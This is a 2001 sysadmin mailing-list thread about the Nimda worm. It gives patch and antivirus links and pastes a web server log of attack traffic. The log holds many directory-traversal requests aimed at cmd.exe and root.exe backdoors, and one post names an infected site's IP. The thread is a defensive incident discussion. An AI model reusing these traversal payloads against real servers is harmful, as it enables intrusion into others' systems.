Gentlemen there is a Worm/Virus out there and it is called Nimda (ADMIN BACKWARDS). It propagates via email, web servers and browsers. Merely previewing it puts you in the sack. You can take a look at these links and patch up ASAP. It wreaks havoc. Visit the CERT Site and read the article on Nimda: http://www.cert.org/body/advisories/CA200126_FA200126.html You are also advised to visit the Microsofdt Website: http://www.microsoft.com/technet/security/bulletin/MS01-044.asp and download and install this patch. If you already have the Security Rollup Package then you are protected. The same goes for the IIS lockdown tool if you have it configured in Default mode you are also protected. The worm/virus is a followup to the Code Red cept that it propagates via Email, Browsers, webservers, and connecting to ordinary NT shares. If you are hit I advise you isolate that box/segment first and then decide on a strategy to eliminate the Virus. The stuff in the previous message is the footprint of the virus. Antivirus Vendor Information Data Fellows Corp http://www.datafellows.com/v-descs/nimda.shtml McAfee http://vil.mcafee.com/dispVirus.asp?virus_k=99209&; Sophos http://www.sophos.com/virusinfo/analyses/w32nimdaa.html Symantec http:[EMAIL PROTECTED] Trend Micro http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName= TROJ_NIMDA.A http://www.antivirus.com/pc-cillin/vinfo/virusencyclo/default5. asp?VName=TROJ_NIMDA.A You may wish to visit the CERT/CC's computer virus resources page located at http://www.cert.org/other_sources/viruses.html -----Original Message----- From: David B. Lunn [mailto:[EMAIL PROTECTED]] Sent: 19 September 2001 07:34 To: NT System Admin Issues Subject: RE: WARNING: Hacker Alert Why would you put a link to an infected site? If someone does not have sept 18th patterns???? They will immediately be infected??? -----Original Message----- From: Martin Blackstone [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 8:19 AM To: NT System Admin Issues Subject: RE: WARNING: Hacker Alert Here is a site that has been hit http://216.39.178.32 -----Original Message----- From: Jason Morris [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 7:59 AM To: NT System Admin Issues Subject: RE: WARNING: Hacker Alert CodeRed seems to have dwindled to nothing on my logs. But it's being replaced with the EXACT same lines you have below, and they stay consistent with the code red 2 methods of attacking the more local subnets. Jason Morris CCDA CCNP Network Administrator MJMC, Inc. 708-225-2350 [EMAIL PROTECTED] -----Original Message----- From: Jason Morris [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 9:50 AM To: NT System Admin Issues Cc: '[EMAIL PROTECTED]' Subject: RE: WARNING: Hacker Alert Yes. It seems to be systems I have previously monitored hitting me with codered attacks. I bet someone is activating all of their children. Jason Morris CCDA CCNP Network Administrator MJMC, Inc. 708-225-2350 [EMAIL PROTECTED] -----Original Message----- From: xylog [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 9:45 AM To: NT System Admin Issues Subject: WARNING: Hacker Alert All my public facing web servers at home and at my office have shown a huge continuous hacking activity. Has anyone seen similar? I fear this may be code red related or automated. Please comment if you have seen similar. Here is an excerpt from one logfile: 63.101.9.107, -, 9/18/01, 10:36:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..� ../..� ../..� ../winnt/system32/cmd.exe , /c+dir, 63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/..� ../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:33, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir, 64.156.252.27, -, 9/18/01, 10:36:42, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 15, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:06, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..� ../..� ../..� ../winnt/system32/cmd.exe , /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3, GET, /scripts/..� ../winnt/system32/cmd.exe, /c+dir, 64.156.252.27, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -, 63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:17, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir, 63.230.208.17, -, 9/18/01, 10:37:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir, 63.230.208.17, -, 9/18/01, 10:37:22, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir, 63.230.208.17, -, 9/18/01, 10:37:24, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir, 63.230.208.17, -, 9/18/01, 10:37:26, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir, 63.230.208.17, -, 9/18/01, 10:37:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.230.208.17, -, 9/18/01, 10:37:34, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir, 63.230.208.17, -, 9/18/01, 10:37:36, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir, 63.230.208.17, -, 9/18/01, 10:37:42, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..� ../..� ../..� ../winnt/system32/cmd.exe , /c+dir, 63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir, 63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir, 63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..� ../..� ../..� ../winnt/system32/cmd.exe , /c+dir, 63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3, GET, /scripts/..� ../winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -, 9/18/01, 10:39:41, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 64.156.252.27, -, 9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 172, 41, 13973, 200, 0, GET, /mpf-flow/flow/login.cfm, -, 63.114.34.130, -, 9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -, 9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -, 9/18/01, 10:39:47, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir, http://www.sunbelt-software.com/ntsysadmin_list_charter.htm Confidential: This e-mail and any files transmitted with it are the property of Lanco International and/or its affiliates, are confidential, and are intended solely for the use of the individual or entity to whom this e-mail is addressed. If you are not one of the named recipient(s) or otherwise have reason to believe that you have received this message in error, please notify the sender at the above e-mail address and delete this message immediately from your computer. Any other use, retention, dissemination, forwarding, printing or copying of this e-mail is strictly prohibited. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm Confidential: This e-mail and any files transmitted with it are the property of Lanco International and/or its affiliates, are confidential, and are intended solely for the use of the individual or entity to whom this e-mail is addressed. If you are not one of the named recipient(s) or otherwise have reason to believe that you have received this message in error, please notify the sender at the above e-mail address and delete this message immediately from your computer. Any other use, retention, dissemination, forwarding, printing or copying of this e-mail is strictly prohibited. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
